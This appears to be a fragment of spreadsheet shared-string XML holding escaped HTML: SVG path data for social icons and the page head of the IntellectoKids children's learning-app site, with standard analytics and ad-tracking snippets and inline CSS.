    <t>4.429q0 0.304-0.036 0.839h-11.75q0 1.982 1.027 3.063t2.973 1.080zM4.946 23.214h5.286q3.661 0 3.661-2.982 0-3.214-3.554-3.214h-5.393v6.196zM4.946 13.625h5.018q1.393 0 2.205-0.652t0.813-2.027q0-2.571-3.393-2.571h-4.643v5.25zM0 4.536h10.607q1.554 0 2.768 0.25t2.259 0.848 1.607 1.723 0.563 2.75q0 3.232-3.071 4.696 2.036 0.571 3.071 2.054t1.036 3.643q0 1.339-0.438 2.438t-1.179 1.848-1.759 1.268-2.161 0.75-2.393 0.232h-10.911v-22.5z"&gt;&lt;/path&gt;
&lt;/symbol&gt;
&lt;symbol id="icon-deviantart" viewBox="0 0 18 32"&gt;
&lt;path class="path1" d="M18.286 5.411l-5.411 10.393 0.429 0.554h4.982v7.411h-9.054l-0.786 0.536-2.536 4.875-0.536 0.536h-5.375v-5.411l5.411-10.411-0.429-0.536h-4.982v-7.411h9.054l0.786-0.536 2.536-4.875 0.536-0.536h5.375v5.411z"&gt;&lt;/path&gt;
&lt;/symbol&gt;
&lt;symbol id="icon-medium" viewBox="0 0 32 32"&gt;
&lt;path class="path1" d="M10.661</t>
  </si>
  <si>
    <t>7.518v20.946q0 0.446-0.223 0.759t-0.652 0.313q-0.304 0-0.589-0.143l-8.304-4.161q-0.375-0.179-0.634-0.598t-0.259-0.83v-20.357q0-0.357 0.179-0.607t0.518-0.25q0.25 0 0.786 0.268l9.125 4.571q0.054 0.054 0.054 0.089zM11.804</t>
  </si>
  <si>
    <t>9.321l9.536 15.464-9.536-4.75v-10.714zM32 9.643v18.821q0 0.446-0.25 0.723t-0.679 0.277-0.839-0.232l-7.875-3.929zM31.946 7.5q0 0.054-4.58 7.491t-5.366 8.705l-6.964-11.321 5.786-9.411q0.304-0.5 0.929-0.5 0.25 0 0.464 0.107l9.661 4.821q0.071 0.036 0.071 0.107z"&gt;&lt;/path&gt;
&lt;/symbol&gt;
&lt;symbol id="icon-slideshare" viewBox="0 0 32 32"&gt;
&lt;path class="path1" d="M15.589 13.214q0 1.482-1.134 2.545t-2.723 1.063-2.723-1.063-1.134-2.545q0-1.5 1.134-2.554t2.723-1.054 2.723 1.054 1.134 2.554zM24.554 13.214q0 1.482-1.125 2.545t-2.732 1.063q-1.589 0-2.723-1.063t-1.134-2.545q0-1.5 1.134-2.554t2.723-1.054q1.607 0 2.732 1.054t1.125 2.554zM28.571 16.429v-11.911q0-1.554-0.571-2.205t-1.982-0.652h-19.857q-1.482 0-2.009 0.607t-0.527 2.25v12.018q0.768 0.411 1.58 0.714t1.446 0.5 1.446 0.33 1.268 0.196 1.25 0.071 1.045 0.009 1.009-0.036 0.795-0.036q1.214-0.018 1.696 0.482 0.107</t>
  </si>
  <si>
    <t>0.107 0.179 0.161 0.464 0.446 1.089 0.911 0.125-1.625 2.107-1.554 0.089 0 0.652 0.027t0.768 0.036 0.813 0.018 0.946-0.018 0.973-0.080 1.089-0.152 1.107-0.241 1.196-0.348 1.205-0.482 1.286-0.616zM31.482 16.339q-2.161 2.661-6.643 4.5 1.5 5.089-0.411 8.304-1.179 2.018-3.268 2.643-1.857 0.571-3.25-0.268-1.536-0.911-1.464-2.929l-0.018-5.821v-0.018q-0.143-0.036-0.438-0.107t-0.42-0.089l-0.018 6.036q0.071 2.036-1.482 2.929-1.411 0.839-3.268 0.268-2.089-0.643-3.25-2.679-1.875-3.214-0.393-8.268-4.482-1.839-6.643-4.5-0.446-0.661-0.071-1.125t1.071 0.018q0.054 0.036 0.196 0.125t0.196 0.143v-12.393q0-1.286 0.839-2.196t2.036-0.911h22.446q1.196 0 2.036 0.911t0.839 2.196v12.393l0.375-0.268q0.696-0.482 1.071-0.018t-0.071 1.125z"&gt;&lt;/path&gt;
&lt;/symbol&gt;
&lt;symbol id="icon-snapchat-ghost" viewBox="0 0 30 32"&gt;
&lt;path class="path1" d="M15.143 2.286q2.393-0.018 4.295 1.223t2.92 3.438q0.482 1.036 0.482 3.196 0 0.839-0.161 3.411 0.25 0.125 0.5 0.125 0.321 0</t>
  </si>
  <si>
    <t>0.911-0.241t0.911-0.241q0.518 0 1 0.321t0.482 0.821q0 0.571-0.563 0.964t-1.232 0.563-1.232 0.518-0.563 0.848q0 0.268 0.214 0.768 0.661 1.464 1.83 2.679t2.58 1.804q0.5 0.214 1.429 0.411 0.5 0.107 0.5 0.625 0 1.25-3.911 1.839-0.125 0.196-0.196 0.696t-0.25 0.83-0.589 0.33q-0.357 0-1.107-0.116t-1.143-0.116q-0.661 0-1.107 0.089-0.571 0.089-1.125 0.402t-1.036 0.679-1.036 0.723-1.357 0.598-1.768 0.241q-0.929 0-1.723-0.241t-1.339-0.598-1.027-0.723-1.036-0.679-1.107-0.402q-0.464-0.089-1.125-0.089-0.429 0-1.17 0.134t-1.045 0.134q-0.446 0-0.625-0.33t-0.25-0.848-0.196-0.714q-3.911-0.589-3.911-1.839 0-0.518 0.5-0.625 0.929-0.196 1.429-0.411 1.393-0.571 2.58-1.804t1.83-2.679q0.214-0.5 0.214-0.768 0-0.5-0.563-0.848t-1.241-0.527-1.241-0.563-0.563-0.938q0-0.482 0.464-0.813t0.982-0.33q0.268 0 0.857 0.232t0.946 0.232q0.321 0 0.571-0.125-0.161-2.536-0.161-3.393 0-2.179 0.482-3.214 1.143-2.446 3.071-3.536t4.714-1.125z"&gt;&lt;/path&gt;
&lt;/symbol&gt;
&lt;symbol id="icon-yelp" viewBox="0 0 27 32"&gt;
&lt;path class="path1" d="M13.804 23.554v2.268q-0.018 5.214-0.107 5.446-0.214 0.571-0.911 0.714-0.964 0.161-3.241-0.679t-2.902-1.589q-0.232-0.268-0.304-0.643-0.018-0.214 0.071-0.464 0.071-0.179 0.607-0.839t3.232-3.857q0.018 0 1.071-1.25 0.268-0.339 0.705-0.438t0.884 0.063q0.429 0.179 0.67 0.518t0.223 0.75zM11.143 19.071q-0.054 0.982-0.929 1.25l-2.143 0.696q-4.911 1.571-5.214 1.571-0.625-0.036-0.964-0.643-0.214-0.446-0.304-1.339-0.143-1.357 0.018-2.973t0.536-2.223 1-0.571q0.232 0 3.607 1.375 1.25 0.518 2.054 0.839l1.5 0.607q0.411 0.161 0.634 0.545t0.205 0.866zM25.893 24.375q-0.125 0.964-1.634 2.875t-2.42 2.268q-0.661 0.25-1.125-0.125-0.25-0.179-3.286-5.125l-0.839-1.375q-0.25-0.375-0.205-0.821t0.348-0.821q0.625-0.768 1.482-0.464 0.018 0.018 2.125 0.714 3.625 1.179 4.321 1.42t0.839 0.366q0.5 0.393 0.393</t>
  </si>
  <si>
    <t>1.089zM13.893 13.089q0.089 1.821-0.964 2.179-1.036 0.304-2.036-1.268l-6.75-10.679q-0.143-0.625 0.339-1.107 0.732-0.768 3.705-1.598t4.009-0.563q0.714 0.179 0.875 0.804 0.054 0.321 0.393 5.455t0.429 6.777zM25.714 15.018q0.054 0.696-0.464 1.054-0.268 0.179-5.875 1.536-1.196 0.268-1.625 0.411l0.018-0.036q-0.411 0.107-0.821-0.071t-0.661-0.571q-0.536-0.839 0-1.554 0.018-0.018 1.339-1.821 2.232-3.054 2.679-3.643t0.607-0.696q0.5-0.339 1.161-0.036 0.857 0.411 2.196 2.384t1.446 2.991v0.054z"&gt;&lt;/path&gt;
&lt;/symbol&gt;
&lt;symbol id="icon-vine" viewBox="0 0 27 32"&gt;
&lt;path class="path1" d="M26.732 14.768v3.536q-1.804 0.411-3.536 0.411-1.161 2.429-2.955 4.839t-3.241 3.848-2.286 1.902q-1.429 0.804-2.893-0.054-0.5-0.304-1.080-0.777t-1.518-1.491-1.83-2.295-1.92-3.286-1.884-4.357-1.634-5.616-1.259-6.964h5.054q0.464 3.893 1.25 7.116t1.866 5.661 2.17 4.205 2.5 3.482q3.018-3.018 5.125-7.25-2.536-1.286-3.982-3.929t-1.446-5.946q0-3.429 1.857-5.616t5.071-2.188q3.179 0 4.875 1.884t1.696 5.313q0 2.839-1.036 5.107-0.125 0.018-0.348 0.054t-0.821 0.036-1.125-0.107-1.107-0.455-0.902-0.92q0.554-1.839 0.554-3.286 0-1.554-0.518-2.357t-1.411-0.804q-0.946 0-1.518 0.884t-0.571 2.509q0 3.321 1.875 5.241t4.768 1.92q1.107 0</t>
  </si>
  <si>
    <t>2.161-0.25z"&gt;&lt;/path&gt;
&lt;/symbol&gt;
&lt;symbol id="icon-vk" viewBox="0 0 35 32"&gt;
&lt;path class="path1" d="M34.232 9.286q0.411 1.143-2.679 5.25-0.429 0.571-1.161 1.518-1.393 1.786-1.607 2.339-0.304 0.732 0.25 1.446 0.304 0.375 1.446 1.464h0.018l0.071 0.071q2.518 2.339 3.411 3.946 0.054 0.089 0.116 0.223t0.125 0.473-0.009 0.607-0.446 0.491-1.054 0.223l-4.571 0.071q-0.429 0.089-1-0.089t-0.929-0.393l-0.357-0.214q-0.536-0.375-1.25-1.143t-1.223-1.384-1.089-1.036-1.009-0.277q-0.054 0.018-0.143 0.063t-0.304 0.259-0.384 0.527-0.304 0.929-0.116 1.384q0 0.268-0.063 0.491t-0.134 0.33l-0.071 0.089q-0.321 0.339-0.946 0.393h-2.054q-1.268 0.071-2.607-0.295t-2.348-0.946-1.839-1.179-1.259-1.027l-0.446-0.429q-0.179-0.179-0.491-0.536t-1.277-1.625-1.893-2.696-2.188-3.768-2.33-4.857q-0.107-0.286-0.107-0.482t0.054-0.286l0.071-0.107q0.268-0.339 1.018-0.339l4.893-0.036q0.214 0.036 0.411 0.116t0.286 0.152l0.089 0.054q0.286 0.196 0.429 0.571 0.357 0.893 0.821 1.848t0.732 1.455l0.286 0.518q0.518 1.071 1 1.857t0.866 1.223 0.741 0.688 0.607 0.25 0.482-0.089q0.036-0.018 0.089-0.089t0.214-0.393 0.241-0.839 0.17-1.446 0-2.232q-0.036-0.714-0.161-1.304t-0.25-0.821l-0.107-0.214q-0.446-0.607-1.518-0.768-0.232-0.036 0.089-0.429 0.304-0.339 0.679-0.536 0.946-0.464 4.268-0.429 1.464 0.018 2.411 0.232 0.357 0.089 0.598</t>
  </si>
  <si>
    <t>0.241t0.366 0.429 0.188 0.571 0.063 0.813-0.018 0.982-0.045 1.259-0.027 1.473q0 0.196-0.018 0.75t-0.009 0.857 0.063 0.723 0.205 0.696 0.402 0.438q0.143 0.036 0.304 0.071t0.464-0.196 0.679-0.616 0.929-1.196 1.214-1.92q1.071-1.857 1.911-4.018 0.071-0.179 0.179-0.313t0.196-0.188l0.071-0.054 0.089-0.045t0.232-0.054 0.357-0.009l5.143-0.036q0.696-0.089 1.143 0.045t0.554 0.295z"&gt;&lt;/path&gt;
&lt;/symbol&gt;
&lt;symbol id="icon-search" viewBox="0 0 30 32"&gt;
&lt;path class="path1" d="M20.571 14.857q0-3.304-2.348-5.652t-5.652-2.348-5.652 2.348-2.348 5.652 2.348 5.652 5.652 2.348 5.652-2.348 2.348-5.652zM29.714 29.714q0 0.929-0.679 1.607t-1.607 0.679q-0.964 0-1.607-0.679l-6.125-6.107q-3.196 2.214-7.125 2.214-2.554 0-4.884-0.991t-4.018-2.679-2.679-4.018-0.991-4.884 0.991-4.884 2.679-4.018 4.018-2.679 4.884-0.991 4.884 0.991 4.018 2.679 2.679 4.018 0.991</t>
  </si>
  <si>
    <t>4.884q0 3.929-2.214 7.125l6.125 6.125q0.661 0.661 0.661 1.607z"&gt;&lt;/path&gt;
&lt;/symbol&gt;
&lt;symbol id="icon-envelope-o" viewBox="0 0 32 32"&gt;
&lt;path class="path1" d="M29.714 26.857v-13.714q-0.571 0.643-1.232 1.179-4.786 3.679-7.607 6.036-0.911 0.768-1.482 1.196t-1.545 0.866-1.83 0.438h-0.036q-0.857 0-1.83-0.438t-1.545-0.866-1.482-1.196q-2.821-2.357-7.607-6.036-0.661-0.536-1.232-1.179v13.714q0 0.232 0.17 0.402t0.402 0.17h26.286q0.232 0 0.402-0.17t0.17-0.402zM29.714 8.089v-0.438t-0.009-0.232-0.054-0.223-0.098-0.161-0.161-0.134-0.25-0.045h-26.286q-0.232 0-0.402 0.17t-0.17</t>
  </si>
  <si>
    <t>0.402q0 3 2.625 5.071 3.446 2.714 7.161 5.661 0.107 0.089 0.625 0.527t0.821 0.67 0.795 0.563 0.902 0.491 0.768 0.161h0.036q0.357 0 0.768-0.161t0.902-0.491 0.795-0.563 0.821-0.67 0.625-0.527q3.714-2.946 7.161-5.661 0.964-0.768 1.795-2.063t0.83-2.348zM32 7.429v19.429q0 1.179-0.839 2.018t-2.018 0.839h-26.286q-1.179 0-2.018-0.839t-0.839-2.018v-19.429q0-1.179 0.839-2.018t2.018-0.839h26.286q1.179 0 2.018 0.839t0.839 2.018z"&gt;&lt;/path&gt;
&lt;/symbol&gt;
&lt;symbol id="icon-close" viewBox="0 0 25 32"&gt;
&lt;path class="path1" d="M23.179 23.607q0 0.714-0.5 1.214l-2.429 2.429q-0.5 0.5-1.214 0.5t-1.214-0.5l-5.25-5.25-5.25 5.25q-0.5 0.5-1.214 0.5t-1.214-0.5l-2.429-2.429q-0.5-0.5-0.5-1.214t0.5-1.214l5.25-5.25-5.25-5.25q-0.5-0.5-0.5-1.214t0.5-1.214l2.429-2.429q0.5-0.5 1.214-0.5t1.214 0.5l5.25 5.25 5.25-5.25q0.5-0.5 1.214-0.5t1.214 0.5l2.429 2.429q0.5 0.5 0.5 1.214t-0.5 1.214l-5.25 5.25 5.25 5.25q0.5 0.5 0.5 1.214z"&gt;&lt;/path&gt;
&lt;/symbol&gt;
&lt;symbol id="icon-angle-down" viewBox="0 0 21 32"&gt;
&lt;path class="path1" d="M19.196 13.143q0 0.232-0.179 0.411l-8.321 8.321q-0.179 0.179-0.411 0.179t-0.411-0.179l-8.321-8.321q-0.179-0.179-0.179-0.411t0.179-0.411l0.893-0.893q0.179-0.179 0.411-0.179t0.411 0.179l7.018 7.018 7.018-7.018q0.179-0.179 0.411-0.179t0.411 0.179l0.893 0.893q0.179 0.179 0.179</t>
  </si>
  <si>
    <t>0.411z"&gt;&lt;/path&gt;
&lt;/symbol&gt;
&lt;symbol id="icon-folder-open" viewBox="0 0 34 32"&gt;
&lt;path class="path1" d="M33.554 17q0 0.554-0.554 1.179l-6 7.071q-0.768 0.911-2.152 1.545t-2.563 0.634h-19.429q-0.607 0-1.080-0.232t-0.473-0.768q0-0.554 0.554-1.179l6-7.071q0.768-0.911 2.152-1.545t2.563-0.634h19.429q0.607 0 1.080 0.232t0.473 0.768zM27.429 10.857v2.857h-14.857q-1.679 0-3.518 0.848t-2.929 2.134l-6.107 7.179q0-0.071-0.009-0.223t-0.009-0.223v-17.143q0-1.643 1.179-2.821t2.821-1.179h5.714q1.643 0 2.821 1.179t1.179 2.821v0.571h9.714q1.643 0 2.821 1.179t1.179 2.821z"&gt;&lt;/path&gt;
&lt;/symbol&gt;
&lt;symbol id="icon-twitter" viewBox="0 0 30 32"&gt;
&lt;path class="path1" d="M28.929 7.286q-1.196 1.75-2.893 2.982 0.018 0.25 0.018 0.75 0 2.321-0.679 4.634t-2.063 4.437-3.295 3.759-4.607 2.607-5.768 0.973q-4.839 0-8.857-2.589 0.625 0.071 1.393 0.071 4.018 0 7.161-2.464-1.875-0.036-3.357-1.152t-2.036-2.848q0.589 0.089 1.089 0.089 0.768 0 1.518-0.196-2-0.411-3.313-1.991t-1.313-3.67v-0.071q1.214 0.679 2.607 0.732-1.179-0.786-1.875-2.054t-0.696-2.75q0-1.571 0.786-2.911 2.161 2.661 5.259 4.259t6.634 1.777q-0.143-0.679-0.143-1.321 0-2.393 1.688-4.080t4.080-1.688q2.5 0 4.214 1.821 1.946-0.375 3.661-1.393-0.661 2.054-2.536 3.179 1.661-0.179 3.321-0.893z"&gt;&lt;/path&gt;
&lt;/symbol&gt;
&lt;symbol id="icon-facebook" viewBox="0 0 19 32"&gt;
&lt;path class="path1" d="M17.125</t>
  </si>
  <si>
    <t>0.214v4.714h-2.804q-1.536 0-2.071 0.643t-0.536 1.929v3.375h5.232l-0.696 5.286h-4.536v13.554h-5.464v-13.554h-4.554v-5.286h4.554v-3.893q0-3.321 1.857-5.152t4.946-1.83q2.625 0 4.071 0.214z"&gt;&lt;/path&gt;
&lt;/symbol&gt;
&lt;symbol id="icon-github" viewBox="0 0 27 32"&gt;
&lt;path class="path1" d="M13.714 2.286q3.732 0 6.884 1.839t4.991 4.991 1.839 6.884q0 4.482-2.616 8.063t-6.759 4.955q-0.482 0.089-0.714-0.125t-0.232-0.536q0-0.054 0.009-1.366t0.009-2.402q0-1.732-0.929-2.536 1.018-0.107 1.83-0.321t1.679-0.696 1.446-1.188 0.946-1.875 0.366-2.688q0-2.125-1.411-3.679 0.661-1.625-0.143-3.643-0.5-0.161-1.446 0.196t-1.643 0.786l-0.679 0.429q-1.661-0.464-3.429-0.464t-3.429 0.464q-0.286-0.196-0.759-0.482t-1.491-0.688-1.518-0.241q-0.804 2.018-0.143 3.643-1.411 1.554-1.411 3.679 0 1.518 0.366 2.679t0.938 1.875 1.438 1.196 1.679 0.696 1.83 0.321q-0.696 0.643-0.875 1.839-0.375 0.179-0.804 0.268t-1.018 0.089-1.17-0.384-0.991-1.116q-0.339-0.571-0.866-0.929t-0.884-0.429l-0.357-0.054q-0.375 0-0.518 0.080t-0.089 0.205 0.161 0.25 0.232</t>
  </si>
  <si>
    <t>0.214l0.125 0.089q0.393 0.179 0.777 0.679t0.563 0.911l0.179 0.411q0.232 0.679 0.786 1.098t1.196 0.536 1.241 0.125 0.991-0.063l0.411-0.071q0 0.679 0.009 1.58t0.009 0.973q0 0.321-0.232 0.536t-0.714 0.125q-4.143-1.375-6.759-4.955t-2.616-8.063q0-3.732 1.839-6.884t4.991-4.991 6.884-1.839zM5.196 21.982q0.054-0.125-0.125-0.214-0.179-0.054-0.232 0.036-0.054 0.125 0.125 0.214 0.161 0.107 0.232-0.036zM5.75</t>
  </si>
  <si>
    <t>22.589q0.125-0.089-0.036-0.286-0.179-0.161-0.286-0.054-0.125 0.089 0.036 0.286 0.179 0.179 0.286 0.054zM6.286 23.393q0.161-0.125 0-0.339-0.143-0.232-0.304-0.107-0.161 0.089 0 0.321t0.304 0.125zM7.036 24.143q0.143-0.143-0.071-0.339-0.214-0.214-0.357-0.054-0.161 0.143 0.071 0.339 0.214 0.214 0.357</t>
  </si>
  <si>
    <t>0.054zM8.054 24.589q0.054-0.196-0.232-0.286-0.268-0.071-0.339 0.125t0.232 0.268q0.268 0.107 0.339-0.107zM9.179 24.679q0-0.232-0.304-0.196-0.286 0-0.286 0.196 0 0.232 0.304 0.196 0.286 0 0.286-0.196zM10.214 24.5q-0.036-0.196-0.321-0.161-0.286 0.054-0.25 0.268t0.321 0.143 0.25-0.25z"&gt;&lt;/path&gt;
&lt;/symbol&gt;
&lt;symbol id="icon-bars" viewBox="0 0 27 32"&gt;
&lt;path class="path1" d="M27.429 24v2.286q0 0.464-0.339 0.804t-0.804 0.339h-25.143q-0.464 0-0.804-0.339t-0.339-0.804v-2.286q0-0.464 0.339-0.804t0.804-0.339h25.143q0.464 0 0.804 0.339t0.339 0.804zM27.429 14.857v2.286q0 0.464-0.339 0.804t-0.804 0.339h-25.143q-0.464 0-0.804-0.339t-0.339-0.804v-2.286q0-0.464 0.339-0.804t0.804-0.339h25.143q0.464 0 0.804 0.339t0.339 0.804zM27.429 5.714v2.286q0 0.464-0.339 0.804t-0.804 0.339h-25.143q-0.464 0-0.804-0.339t-0.339-0.804v-2.286q0-0.464 0.339-0.804t0.804-0.339h25.143q0.464 0 0.804</t>
  </si>
  <si>
    <t>0.339t0.339 0.804z"&gt;&lt;/path&gt;
&lt;/symbol&gt;
&lt;symbol id="icon-google-plus" viewBox="0 0 41 32"&gt;
&lt;path class="path1" d="M25.661 16.304q0 3.714-1.554 6.616t-4.429 4.536-6.589 1.634q-2.661 0-5.089-1.036t-4.179-2.786-2.786-4.179-1.036-5.089 1.036-5.089 2.786-4.179 4.179-2.786 5.089-1.036q5.107 0 8.768 3.429l-3.554 3.411q-2.089-2.018-5.214-2.018-2.196 0-4.063 1.107t-2.955 3.009-1.089 4.152 1.089 4.152 2.955 3.009 4.063 1.107q1.482 0 2.723-0.411t2.045-1.027 1.402-1.402 0.875-1.482 0.384-1.321h-7.429v-4.5h12.357q0.214 1.125 0.214 2.179zM41.143 14.125v3.75h-3.732v3.732h-3.75v-3.732h-3.732v-3.75h3.732v-3.732h3.75v3.732h3.732z"&gt;&lt;/path&gt;
&lt;/symbol&gt;
&lt;symbol id="icon-linkedin" viewBox="0 0 27 32"&gt;
&lt;path class="path1" d="M6.232 11.161v17.696h-5.893v-17.696h5.893z</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en"&gt;&lt;head&gt;
  &lt;meta charset="utf-8"&gt;
  &lt;title&gt;IntellectoKids&lt;/title&gt;
  &lt;meta name="keywords" content="IntellectoKids,Intellecto Kids,learning games for kids,learning games,educational games for kids,educational games,kids learning games,preschool learning games,learning tools for kids,education games,educational games,kids educational games,best educational apps,educational apps for kids,educational games for preschoolers,learning apps for kids,education apps,learning apps,best educational apps for kids,best learning apps,best apps for preschoolers,best learning apps for kids,best learning apps for toddlers,learning apps for toddlers,best educational apps for toddlers,toddler learning games,learning games for toddlers,fun educational games,learning games for preschoolers,kindergarten learning games,fun learning games,educational games for toddlers,educational math games,kid learning games,educational math games,fun math games,fun math games for kids, math apps for kids,math games,math games for kids,kids math games"&gt;
  &lt;meta name="description" content="IntellectoKids - Comprehensive programe to ready your child for school by app for iOS and Android. Structured curriculum for kids ages 5-7 based on XXI Century Skills, Common Core Standards (US) &amp;amp; National Curriculum (UK). Math, Phonics, Alphabet, Science, Arts &amp;amp; more "&gt;
  &lt;base href="/"&gt;
  &lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
  &lt;link rel="icon" type="image/x-icon" href="favicon.ico"&gt;
  &lt;script async="" src="https://www.googletagmanager.com/gtag/js?id=G-0THV0Q1SPV"&gt;&lt;/script&gt;
  &lt;script&gt;
      window.dataLayer = window.dataLayer ||</t>
  </si>
  <si>
    <t xml:space="preserve">[];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());
      gtag('config', 'G-0THV0Q1SPV');
      gtag('config', 'AW-840131104'); 
  &lt;/script&gt;
  &lt;!-- Google Tag Manager --&gt;
  &lt;script&gt;(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
    new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
    </t>
  </si>
  <si>
    <t>j=d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;j.src=
    'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
    })(window,document,'script','dataLayer','GTM-5LDQVF');&lt;/script&gt;
    &lt;!-- End Google Tag Manager --&gt;
  &lt;script&gt;
    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
    (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
    m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
    })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
    ga('create', 'G-0THV0Q1SPV', 'auto');
  &lt;/script&gt;
  &lt;script&gt;
    (function(w,d,t,r,u){var f,n,i;w[u]=w[u]||[],f=function(){var o={ti:"137002926"};o.q=w[u],w[u]=new UET(o),w[u].push("pageLoad")},n=d.createElement(t),n.src=r,n.async=1,n.onload=n.onreadystatechange=function(){var s=this.readyState;s&amp;&amp;s!=="loaded"&amp;&amp;s!=="complete"||(f(),n.onload=n.onreadystatechange=null)},i=d.getElementsByTagName(t)[0],i.parentNode.insertBefore(n,i)})(window,document,"script","//bat.bing.com/bat.js","uetq");
  &lt;/script&gt;
  &lt;script&gt;
    setTimeout(function() {
      !function(f,b,e,v,n,t,s)
      {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
       n.callMethod.apply(n,arguments):n.queue.push(arguments)};
      if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
      n.queue=[];t=b.createElement(e);t.async=!0;
      t.src=v;s=b.getElementsByTagName(e)[0];
      s.parentNode.insertBefore(t,s)}(window, document,'script',
      'https://connect.facebook.net/en_US/fbevents.js');
      fbq('init', '922316911961006');
      fbq('track', 'PageView');
    }, 5000)
  &lt;/script&gt;
  &lt;noscript&gt;&lt;img height="1" width="1" style="display:none"
    src="https://www.facebook.com/tr?id=922316911961006&amp;ev=PageView&amp;noscript=1"
  /&gt;&lt;/noscript&gt;
&lt;style&gt;*:before,*:after{box-sizing:border-box}body{margin:0}body{min-height:100vh;scroll-behavior:smooth;text-rendering:optimizeSpeed;font-family:Lato;font-weight:400;line-height:150%}@font-face{font-family:Lato;src:url(Lato-Regular.ee3394289e384070.woff2) format("woff2");font-weight:400;font-style:normal;font-display:swap}&lt;/style&gt;&lt;style&gt;*:before,*:after{box-sizing:border-box}ul[class]{padding:0}body,h1,h2,h3,p,ul[class],li{margin:0}body{min-height:100vh;scroll-behavior:smooth;text-rendering:optimizeSpeed;font-family:Lato;font-weight:400;line-height:150%}ul[class]{list-style:none}a:not([class]){-webkit-text-decoration-skip:ink;text-decoration-skip-ink:auto}input,button{font:inherit}button{background:none;border:none}button:focus{outline:none}.wrapper{padding-left:16px;padding-right:16px}@media only screen and (min-width: 768px){.wrapper{padding-left:24px;padding-right:24px}}@media only screen and (min-width: 1200px){.wrapper{padding:0;width:1025px;margin:0 auto}}@media only screen and (min-width: 1280px){.wrapper{padding:0;width:1200px;margin:0 auto}}@font-face{font-family:Lato;src:url(Lato-Regular.ee3394289e384070.woff2) format("woff2");font-weight:400;font-style:normal;font-display:swap}&lt;/style&gt;&lt;link rel="stylesheet" href="styles.13da87773e7f304a.css" media="print" onload="this.media='all'"&gt;&lt;noscript&gt;&lt;link rel="stylesheet" href="styles.13da87773e7f304a.css"&gt;&lt;/noscript&gt;&lt;style ng-transition="serverApp"&gt;.addition[_ngcontent-sc200]{padding-top:90px;padding-bottom:90px}.addition__title[_ngcontent-sc200]{margin-top:30px}.addition__text[_ngcontent-sc200]{margin-bottom:20px;font-family:Lato;font-weight:400;font-size:16px;line-height:24px;color:#2b2e3f}.addition__text.bold[_ngcontent-sc200]{font-weight:700}.addition__text--short[_ngcontent-sc200]{max-width:900px}.addition__list[_ngcontent-sc200]   li[_ngcontent-sc200], .addition__list[_ngcontent-sc200]   ol[_ngcontent-sc200]{display:block;position:relative;margin-bottom:20px;padding-left:36px;font-family:Lato;font-weight:400;font-size:16px;line-height:24px;align-items:center;color:#2b2e3f}.addition__list[_ngcontent-sc200]   li[_ngcontent-sc200]:after{content:"";position:absolute;left:5px;top:7px;width:7px;height:15px;border:solid #26357A;border-width:0 2px 2px 0;transform:rotate(45deg)}.addition__list[_ngcontent-sc200]   li[_ngcontent-sc200]:before{content:"";position:absolute;left:-5px;top:3px;width:28px;height:28px;border-radius:50%;background:#F5F8FF}.addition__list[_ngcontent-sc200]   ol[_ngcontent-sc200]{padding-left:16px;margin-left:20px;display:list-item;list-style-type:numeric;list-style-position:outside}.addition__subtitle[_ngcontent-sc200]{margin-top:60px;margin-bottom:24px;font-family:Merriweather;font-weight:700;font-size:32px;line-height:40px;color:#2b2e3f}.addition[_ngcontent-sc200]   a[_ngcontent-sc200]{color:#000}@media only screen and (min-width: 1024px){.addition[_ngcontent-sc200]{padding-top:120px}.addition__text[_ngcontent-sc200]{margin-bottom:24px;margin-left:108px;font-size:24px;line-height:32px}.addition__subtitle[_ngcontent-sc200]{font-size:32px;line-height:40px;margin-bottom:35px;margin-top:85px;margin-left:108px}.addition__list[_ngcontent-sc200]{padding-left:105px}.addition__list[_ngcontent-sc200]   li[_ngcontent-sc200], .addition__list[_ngcontent-sc200]   ol[_ngcontent-sc200]{font-size:24px;line-height:32px}.addition__list[_ngcontent-sc200]   li[_ngcontent-sc200]   .addition__text[_ngcontent-sc200], .addition__list[_ngcontent-sc200]   ol[_ngcontent-sc200]   .addition__text[_ngcontent-sc200]{margin-left:0}.addition__svg[_ngcontent-sc200]{width:76px;height:76px}}.title[_ngcontent-sc200]{margin-bottom:32px;font-family:Merriweather;font-weight:700;font-size:32px;line-height:40px;color:#26357a}@media only screen and (min-width: 1024px){.title[_ngcontent-sc200]{max-width:930px;margin-bottom:40px;font-size:48px;line-height:56px}}.wrapper[_ngcontent-sc200]{margin-top:50px}&lt;/style&gt;&lt;style ng-transition="serverApp"&gt;.btn[_ngcontent-sc53]{display:flex;justify-content:center;align-items:center;height:64px;margin-top:48px;border:1px solid #D40035;box-sizing:border-box;font-weight:700;font-size:24px;line-height:29px;background:#D40035;color:#fff;transition:color .3s,background-color .3s;cursor:pointer;text-decoration:none}.btn[_ngcontent-sc53]:hover{background:#fff;color:#d40035}.btn[_ngcontent-sc53]:hover   .btn-arrow[_ngcontent-sc53]   path[_ngcontent-sc53]{fill:#d40035}.btn--long[_ngcontent-sc53]{font-size:16px}.btn__text[_ngcontent-sc53]{margin-right:12px}.btn-arrow[_ngcontent-sc53]{margin-top:5px;display:block}.btn-arrow[_ngcontent-sc53]   path[_ngcontent-sc53]{transition:fill .3s;fill:#fff}@media only screen and (min-width: 640px){.btn[_ngcontent-sc53]{width:320px;margin:48px auto 0}.btn--long[_ngcontent-sc53]{font-size:24px;width:420px}}.wrapper[_ngcontent-sc53]{padding-left:16px;padding-right:16px}@media only screen and (min-width: 640px){.wrapper[_ngcontent-sc53]{padding-left:24px;padding-right:24px}}@media only screen and (min-width: 1200px){.wrapper[_ngcontent-sc53]{padding-left:88px;padding-right:88px}}@media only screen and (min-width: 